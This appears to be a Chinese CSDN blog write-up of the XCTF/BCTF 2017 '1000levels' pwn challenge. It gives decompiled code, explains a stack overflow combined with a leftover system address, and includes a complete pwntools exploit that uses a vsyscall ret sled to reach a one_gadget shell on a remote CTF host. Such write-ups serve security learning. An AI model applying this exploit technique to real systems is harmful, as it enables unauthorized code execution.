[XCTF-pwn] 21_xctf-3rd-bctf-2017_1000levels

最新推荐文章于 2024-07-16 15:11:55 发布
最新推荐文章于 2024-07-16 15:11:55 发布
阅读量208 收藏
点赞数
分类专栏: CTF pwn 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123344276
版权

1000级的简版100级。

程序两个函数一个是给个提示,这时候会把system放到栈里(但没有输出),第二个是进行一个100层递归回答问题。

漏洞:

  1. hint函数在if前面将system放到栈里,这样system在栈里有残留
  2. 第2个漏洞是read有溢出,而且很长。

问题是这个题开启了随机化,这样题目加载地址、栈地址、libc加载地址都是随机的,这样就没有可写的东西了。

看来的思路:

  1. 在libc-2.23-0ubuntu9前,使用vsyscall这个东西的地址是固定的,其中第1个函数可以当滑板(相当于ret),这样填充适当的滑板到指定位置执行
  2. 残留的system在加上指定数字后得到one_gadget,利用未初始化指针v4和偏移将system改为one_gadget

先看下v4

int m1go()
{
  __int64 v1; // [rsp+0h] [rbp-120h]
  int v2; // [rsp+8h] [rbp-118h]
  int v3; // [rsp+Ch] [rbp-114h]
  __int64 v4; // [rsp+10h] [rbp-110h]
  __int64 v5; // [rsp+10h] [rbp-110h]
  __int64 v6; // [rsp+18h] [rbp-108h]
  char v7[256]; // [rsp+20h] [rbp-100h] BYREF

  puts("How many levels?");
  v1 = read_long();
  if ( v1 > 0 )
    v4 = v1;
  else
    puts("Coward");
  puts("Any more?");
  v5 = v4 + read_long();  //这里v4由于未初始化,ida会特意标所橙色,v1输入0会保留残留的system
  if ( v5 > 0 )
  {
    if ( v5 <= 99 )
    {
      v6 = v5;
    }
    else
    {
      puts("You are being a real man.");
      v6 = 100LL;
    }
    puts("Let's go!'");
    v2 = time(0LL);
    if ( (unsigned int)sub_E43((unsigned int)v6) )
    {
      v3 = time(0LL);
      sprintf(v7, "Great job! You finished %d levels in %d seconds\n", v6, (unsigned int)(v3 - v2));
      puts(v7);
    }
    else
    {
      puts("You failed.");
    }
    exit(0);
  }
  return puts("Coward Coward Coward Coward Coward");
}
_BOOL8 __fastcall sub_E43(signed int a1)
{
  __int64 v2; // rax
  __int64 buf[4]; // [rsp+10h] [rbp-30h] BYREF
  unsigned int v4; // [rsp+34h] [rbp-Ch]
  unsigned int v5; // [rsp+38h] [rbp-8h]
  unsigned int v6; // [rsp+3Ch] [rbp-4h]

  buf[0] = 0LL;
  buf[1] = 0LL;
  buf[2] = 0LL;
  buf[3] = 0LL;
  if ( !a1 )
    return 1LL;
  if ( !(unsigned int)sub_E43((unsigned int)(a1 - 1)) )
    return 0LL;
  v6 = rand() % a1;
  v5 = rand() % a1;
  v4 = v5 * v6;
  puts("====================================================");
  printf("Level %d\n", (unsigned int)a1);
  printf("Question: %d * %d = ? Answer:", v6, v5);
  read(0, buf, 0x400uLL);                       // 溢出
  v2 = strtol((const char *)buf, 0LL, 10);
  return v2 == v4;
}

递归有溢出很大但是递归会先调用100次入栈然后再退栈,所以先要处理完99次,在最后一次再溢出修改。

完整的exp:

from pwn import *

'''
需要在ubuntu16才能成功
'''

local = 0
if local == 1:
    p = process('./pwn')  #Ubuntu GLIBC 2.23-0ubuntu9
    libc_elf = ELF("/home/shi/pwn/libc6_2.23/libc-2.23.so")
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830
else:
    p = remote('111.200.241.244', 63367) 
    libc_elf = ELF('./libc.so')
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

p.sendlineafter(b"Choice:\n", b'2') #hint
p.sendlineafter(b"Choice:\n", b'1') #go go.v4= system
p.sendlineafter(b"How many levels?\n", b'-1') #v4 = system

offset = one[0] - libc_elf.sym['system']
print('offset', offset)

p.sendlineafter(b"Any more?\n", str(offset).encode()) #v5=v4=one_gadget

#v5>99 v6=100
for i in range(99):
    p.sendafter(b'? Answer:', b'1'.ljust(0x24, b'\x00')+ p32(1))

'''
0x00007fffffffde10│+0x0080: 0x00007fffffffe0a0  →  0x0000000000000001
0x00007fffffffde18│+0x0088: 0x000003e8f7a8782b
0x00007fffffffde20│+0x0090: 0x0000000000000000                                                  buf
0x00007fffffffde28│+0x0098: 0x0000000000000000
0x00007fffffffde30│+0x00a0: 0x0000000000000000
0x00007fffffffde38│+0x00a8: 0x0000000000000000
0x00007fffffffde40│+0x00b0: 0x0000000000000000                                                   v4 v5
0x00007fffffffde48│+0x00b8: 0x00007fffffffdf80                                                   v6 i
0x00007fffffffde50│+0x00c0: 0x00007fffffffdf80  →  0x00007fffffffdfc0  →  0x0000555555554fd0     rbp
0x00007fffffffde58│+0x00c8: 0x0000555555554c74  →  <go()+248> test eax, eax                      ret
0x00007fffffffde60│+0x00d0: 0x0000000000000000                                                   .
0x00007fffffffde68│+0x00d8: 0x0000555561fbf026                                                   .
0x00007fffffffde70│+0x00e0: 0x00007ffff7a523a0  →  <system+0> test rdi, rdi 执行一次hint后v4对应位置被写上system地址,再通过偏移改为one
0x00007fffffffde78│+0x00e8: 0x00000000000003e8
0x00007fffffffde80│+0x00f0: 0x0000004e5546204f ("O FUN"?)
'''

#          buf                        v4     v5     v6     rbp    ret->vsyscall
#payload = b'1'.ljust(0x24, b'\x00') + p32(1)+p32(0)+p32(0)+p64(0)+p64(0xffffffffff600000)*3
payload = b'A'*0x38+p64(0xffffffffff600000)*3  #执行结束后在ret位置写vsyscall_gettimeofday当滑板,滑到one执行
p.sendafter(b'? Answer:', payload)
sleep(0.1)
p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-PWN进阶区-1000levevls(XCTF 3rd-BCTF-2017)
weixin_44145820的博客
02-29 799
这道题是攻防世界上面一道六星的pwn题,比起之前的还是挺有难度,做完也有很大收获 题目分析 首先checksec查看开启的保护 可以看到这题比之前的题目多了一个PIE保护,下面就简单介绍一下什么是PIE PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bs...
hitb-2017 1000levels writeup
jmp esp
08-28 1644
题目分析题目设置的还是比较巧妙的。本身是一个二进制的文件,linux 64环境,保护情况如下: Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled功能一共三个: 1. go:
攻防世界PWN之1000levels题解
seaaseesa的博客
11-09 924
1000levevls 本题是一个栈溢出题,难点在于开启了PIE,因此里面的函数地址是随机的。 溢出点在这里 让我们看看提示功能的函数 看看它的汇编代码 不管条件是否成立,system的地址都会保存到这个函数的rbp-110h处,也就是当前函数的栈顶。 我们再看看这个函数 我们进去看看 如果我们输入的levels大于0,v7才有初始化,那么,如果没有初始化,...
XCTF 3rd-BCTF-2017——100levels
05-08 358
64位程序,没开canary,但开了PIE  #爆破 #vsyscall 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 int v3; // eax 4 5 set(); 6 put_logo(); 7 while ( 1 ) ...
1000levels-vsyscall
playmaker的博客
08-11 307
1000levels-vsyscall 题目是一个64位的程序 具体保护如下 程序主要分为两部分,分别为go部分和hint部分。 首先先看简单的hint部分 int hint() { signed __int64 v1; // [rsp+8h] [rbp-108h] int v2; // [rsp+10h] [rbp-100h] __int16 v3; // [rsp+14h] [r...
XCTF-HW-pipeline附件
11-09
附件
【XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
【XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
BCTF 2017 WEB WriteUp
Bendawang's Blog
04-17 4882
BCTF 2017 WEB WriteUp
XCTF 3rd-GCTF-2017 hackme
qq_41071646的博客
05-07 1714
这个题 有字符串 感觉简单了许多 然后这个题 算法就在这 我们写出来脚本就行 #include <stdio.h> #include<iostream> #include<iomanip> #include<stdio.h> #include<string.h> #include<algorithm> #incl...
RNote XCTF 3rd-RCTF-2017 攻防世界
qq_41071646的博客
06-02 699
这个题 emmm 利用 off by one 然后就是double free 然后 写到 malloc_hook 就ok 不过这个题 我一开始出了一个问题 在 malloc_hook 里面我只是找到了 7f 然后我用了 0x30的堆块 然后不行 malloc的直接在堆块了 没有到我们想要的地方 只能又重新规划 然后 one_gadget 一把梭就好了 存...
2017 bctf boj writeup
jmp esp
05-22 976
BCTF 2017 BOJThis is a very interesting challenge for me. We were given a working oj on http://oj.bctf.xctf.org.cn, there was only a single classical problem a + b on it. I tried several times to play
BCTF2017 BabyUse
weixin_30492601的博客
04-20 132
BCTF2017 BabyUse 问题 问题在于drop函数中在释放块之后没有清空bss_gun_list中的指针。 一般因为存在对bss_gun_flag的验证,所以不会出现什么问题,但是在use功能中没有验证bss_gun_flag struct_ptr = bss_gun_list[global_index_saved]; 因此use功能存在UAF,不得不说这个设计的还是比较隐蔽的,有点考...
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 435
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 302
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1370
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 466
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值